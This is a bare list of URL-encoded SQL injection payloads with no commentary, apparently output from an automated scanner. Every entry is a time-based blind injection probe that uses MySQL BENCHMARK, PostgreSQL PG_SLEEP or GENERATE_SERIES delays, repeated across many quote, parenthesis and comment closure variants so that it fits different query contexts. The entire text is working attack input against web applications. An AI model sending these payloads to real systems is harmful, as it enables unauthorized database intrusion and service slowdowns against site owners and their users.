1%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29 1%27%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29 1%27%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29 1%22%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29 1%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%285360%3D5360 1%29%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%28%282188%3D2188 1%29%29%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%28%28%289607%3D9607 1%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29 1%27%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%28%27jgOv%27%3D%27jgOv 1%27%29%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%28%28%27rCZQ%27%3D%27rCZQ 1%27%29%29%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%28%28%28%27litc%27%3D%27litc 1%27%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%27vhHx%27%3D%27vhHx 1%27%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%28%27wIXn%27%20LIKE%20%27wIXn 1%27%29%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%28%28%27pZkf%27%20LIKE%20%27pZkf 1%27%29%29%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%28%28%28%27yeEv%27%20LIKE%20%27yeEv 1%27%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%27Yrhu%27%20LIKE%20%27Yrhu 1%22%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%28%22fYRD%22%3D%22fYRD 1%22%29%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%28%28%22KRCa%22%3D%22KRCa 1%22%29%29%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%28%28%28%22rCXg%22%3D%22rCXg 1%22%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%22Gnai%22%3D%22Gnai 1%22%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%28%22wheh%22%20LIKE%20%22wheh 1%22%29%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%28%28%22NBBZ%22%20LIKE%20%22NBBZ 1%22%29%29%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%28%28%28%22GUaT%22%20LIKE%20%22GUaT 1%22%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20AND%20%22TWZV%22%20LIKE%20%22TWZV 1%29%20WHERE%208436%3D8436%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29 1%27%29%20WHERE%204044%3D4044%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29 1%27%20WHERE%207010%3D7010%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29 1%22%20WHERE%206525%3D6525%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29 1%27%20%7C%7C%20%28SELECT%202234%20FROM%20DUAL%20WHERE%202545%3D2545%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206411%20WHERE%203526%3D3526%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%206256%20FROM%20DUAL%20WHERE%208873%3D8873%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20%29 1%20%2B%20%28SELECT%201010%20WHERE%201155%3D1155%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20%29 1%27%20%2B%20%28SELECT%20%27rdcp%27%20FROM%20DUAL%20WHERE%202473%3D2473%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27FcaX%27%20WHERE%207532%3D7532%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%209977%3DBENCHMARK%285000000%2CMD5%280x72577662%29%29%20%23 1%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23 1%27%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23 1%27%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23 1%22%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23 1%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%284737%3D4737 1%29%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%28%281034%3D1034 1%29%29%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%28%28%289342%3D9342 1%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23 1%27%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%28%27GLhJ%27%3D%27GLhJ 1%27%29%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%28%28%27GtfY%27%3D%27GtfY 1%27%29%29%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%28%28%28%27pNlW%27%3D%27pNlW 1%27%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%27lavk%27%3D%27lavk 1%27%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%28%27jPag%27%20LIKE%20%27jPag 1%27%29%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%28%28%27VDSO%27%20LIKE%20%27VDSO 1%27%29%29%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%28%28%28%27Ejwj%27%20LIKE%20%27Ejwj 1%27%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%27qVWb%27%20LIKE%20%27qVWb 1%22%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%28%22SMHz%22%3D%22SMHz 1%22%29%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%28%28%22ToCx%22%3D%22ToCx 1%22%29%29%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%28%28%28%22YeTK%22%3D%22YeTK 1%22%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%22qqnx%22%3D%22qqnx 1%22%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%28%22pOAK%22%20LIKE%20%22pOAK 1%22%29%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%28%28%22djST%22%20LIKE%20%22djST 1%22%29%29%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%28%28%28%22Zkzu%22%20LIKE%20%22Zkzu 1%22%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20AND%20%22blMD%22%20LIKE%20%22blMD 1%29%20WHERE%202703%3D2703%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23 1%27%29%20WHERE%209923%3D9923%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23 1%27%20WHERE%204216%3D4216%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23 1%22%20WHERE%206541%3D6541%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23 1%27%20%7C%7C%20%28SELECT%207158%20FROM%20DUAL%20WHERE%204221%3D4221%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201701%20WHERE%207690%3D7690%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%201743%20FROM%20DUAL%20WHERE%207809%3D7809%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20%29 1%20%2B%20%28SELECT%203058%20WHERE%201708%3D1708%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20%29 1%27%20%2B%20%28SELECT%20%27cdir%27%20FROM%20DUAL%20WHERE%202836%3D2836%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27BlyT%27%20WHERE%207044%3D7044%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%206077%3DBENCHMARK%285000000%2CMD5%280x51645079%29%29%23%20%23 1%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29 1%27%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29 1%27%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29 1%22%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29 1%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%286118%3D6118 1%29%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%286049%3D6049 1%29%29%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%282154%3D2154 1%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29 1%27%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27DASn%27%3D%27DASn 1%27%29%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27pabs%27%3D%27pabs 1%27%29%29%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27KaOT%27%3D%27KaOT 1%27%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%27kvIp%27%3D%27kvIp 1%27%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27NXQh%27%20LIKE%20%27NXQh 1%27%29%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27NXOW%27%20LIKE%20%27NXOW 1%27%29%29%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27vGSZ%27%20LIKE%20%27vGSZ 1%27%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%27wmWU%27%20LIKE%20%27wmWU 1%22%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22kIAX%22%3D%22kIAX 1%22%29%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22ddRl%22%3D%22ddRl 1%22%29%29%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22pGSs%22%3D%22pGSs 1%22%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%22AgZI%22%3D%22AgZI 1%22%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22RTcZ%22%20LIKE%20%22RTcZ 1%22%29%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22rfql%22%20LIKE%20%22rfql 1%22%29%29%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22BFvn%22%20LIKE%20%22BFvn 1%22%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20AND%20%22hXix%22%20LIKE%20%22hXix 1%29%20WHERE%203378%3D3378%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29 1%27%29%20WHERE%208826%3D8826%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29 1%27%20WHERE%207909%3D7909%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29 1%22%20WHERE%205838%3D5838%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29 1%27%20%7C%7C%20%28SELECT%205742%20FROM%20DUAL%20WHERE%208892%3D8892%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209019%20WHERE%204543%3D4543%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%207893%20FROM%20DUAL%20WHERE%204395%3D4395%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20%29 1%20%2B%20%28SELECT%202126%20WHERE%201505%3D1505%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20%29 1%27%20%2B%20%28SELECT%20%27jkHf%27%20FROM%20DUAL%20WHERE%205926%3D5926%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27oYIU%27%20WHERE%204924%3D4924%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%202431%3D%28SELECT%202431%20FROM%20PG_SLEEP%285%29%29%20%23 1%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29-- 1%27%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29-- 1%27%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29-- 1%22%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29-- 1%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%287403%3D7403 1%29%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%282655%3D2655 1%29%29%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%281956%3D1956 1%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29-- 1%27%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%27AaCU%27%3D%27AaCU 1%27%29%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%27wuYd%27%3D%27wuYd 1%27%29%29%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%28%27KxKj%27%3D%27KxKj 1%27%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%27uFUH%27%3D%27uFUH 1%27%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%27RBpu%27%20LIKE%20%27RBpu 1%27%29%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%27XcaG%27%20LIKE%20%27XcaG 1%27%29%29%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%28%27dxtN%27%20LIKE%20%27dxtN 1%27%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%27KJpw%27%20LIKE%20%27KJpw 1%22%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%22GKvW%22%3D%22GKvW 1%22%29%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%22RMmn%22%3D%22RMmn 1%22%29%29%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%28%22DVtT%22%3D%22DVtT 1%22%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%22rMeH%22%3D%22rMeH 1%22%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%22Xgft%22%20LIKE%20%22Xgft 1%22%29%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%22fAVD%22%20LIKE%20%22fAVD 1%22%29%29%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%28%28%28%22HEtC%22%20LIKE%20%22HEtC 1%22%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20AND%20%22pErL%22%20LIKE%20%22pErL 1%29%20WHERE%208617%3D8617%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29-- 1%27%29%20WHERE%208785%3D8785%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29-- 1%27%20WHERE%207862%3D7862%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29-- 1%22%20WHERE%209901%3D9901%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29-- 1%27%20%7C%7C%20%28SELECT%202387%20FROM%20DUAL%20WHERE%207513%3D7513%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203134%20WHERE%203607%3D3607%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%209177%20FROM%20DUAL%20WHERE%201816%3D1816%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20%29 1%20%2B%20%28SELECT%201900%20WHERE%204917%3D4917%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20%29 1%27%20%2B%20%28SELECT%20%27xflE%27%20FROM%20DUAL%20WHERE%208956%3D8956%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27jAjG%27%20WHERE%206821%3D6821%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%201811%3D%28SELECT%201811%20FROM%20PG_SLEEP%285%29%29--%20%23 1%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1%27%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1%27%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1%22%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%282300%3D2300 1%29%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%283279%3D3279 1%29%29%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%287002%3D7002 1%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1%27%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27VLVh%27%3D%27VLVh 1%27%29%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27qiBW%27%3D%27qiBW 1%27%29%29%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27wIfc%27%3D%27wIfc 1%27%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27YJTx%27%3D%27YJTx 1%27%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27LIQN%27%20LIKE%20%27LIQN 1%27%29%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27wItp%27%20LIKE%20%27wItp 1%27%29%29%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27oEFU%27%20LIKE%20%27oEFU 1%27%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27eQXC%27%20LIKE%20%27eQXC 1%22%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22pDDh%22%3D%22pDDh 1%22%29%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22oahx%22%3D%22oahx 1%22%29%29%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22kTKa%22%3D%22kTKa 1%22%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22pcCS%22%3D%22pcCS 1%22%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22fJpO%22%20LIKE%20%22fJpO 1%22%29%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22jvxc%22%20LIKE%20%22jvxc 1%22%29%29%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22CjVf%22%20LIKE%20%22CjVf 1%22%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22HqJr%22%20LIKE%20%22HqJr 1%29%20WHERE%203466%3D3466%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1%27%29%20WHERE%204617%3D4617%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1%27%20WHERE%207483%3D7483%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1%22%20WHERE%205509%3D5509%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 1%27%20%7C%7C%20%28SELECT%208236%20FROM%20DUAL%20WHERE%202572%3D2572%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201091%20WHERE%209329%3D9329%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%209282%20FROM%20DUAL%20WHERE%205398%3D5398%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29 1%20%2B%20%28SELECT%201430%20WHERE%201114%3D1114%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29 1%27%20%2B%20%28SELECT%20%27vcIo%27%20FROM%20DUAL%20WHERE%207303%3D7303%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27NvZm%27%20WHERE%207095%3D7095%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%203888%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%23 1%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%22%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%282269%3D2269 1%29%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%282609%3D2609 1%29%29%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%289538%3D9538 1%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%27SPhP%27%3D%27SPhP 1%27%29%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%27wnYm%27%3D%27wnYm 1%27%29%29%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%28%27hmYp%27%3D%27hmYp 1%27%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%27yjpq%27%3D%27yjpq 1%27%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%27aXzE%27%20LIKE%20%27aXzE 1%27%29%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%27yynr%27%20LIKE%20%27yynr 1%27%29%29%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%28%27LhPn%27%20LIKE%20%27LhPn 1%27%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%27LQMg%27%20LIKE%20%27LQMg 1%22%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%22xVDh%22%3D%22xVDh 1%22%29%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%22RSnH%22%3D%22RSnH 1%22%29%29%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%28%22drUn%22%3D%22drUn 1%22%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%22eLux%22%3D%22eLux 1%22%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%22XuWB%22%20LIKE%20%22XuWB 1%22%29%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%22sLiw%22%20LIKE%20%22sLiw 1%22%29%29%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%28%28%28%22fEuI%22%20LIKE%20%22fEuI 1%22%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20AND%20%22qLIZ%22%20LIKE%20%22qLIZ 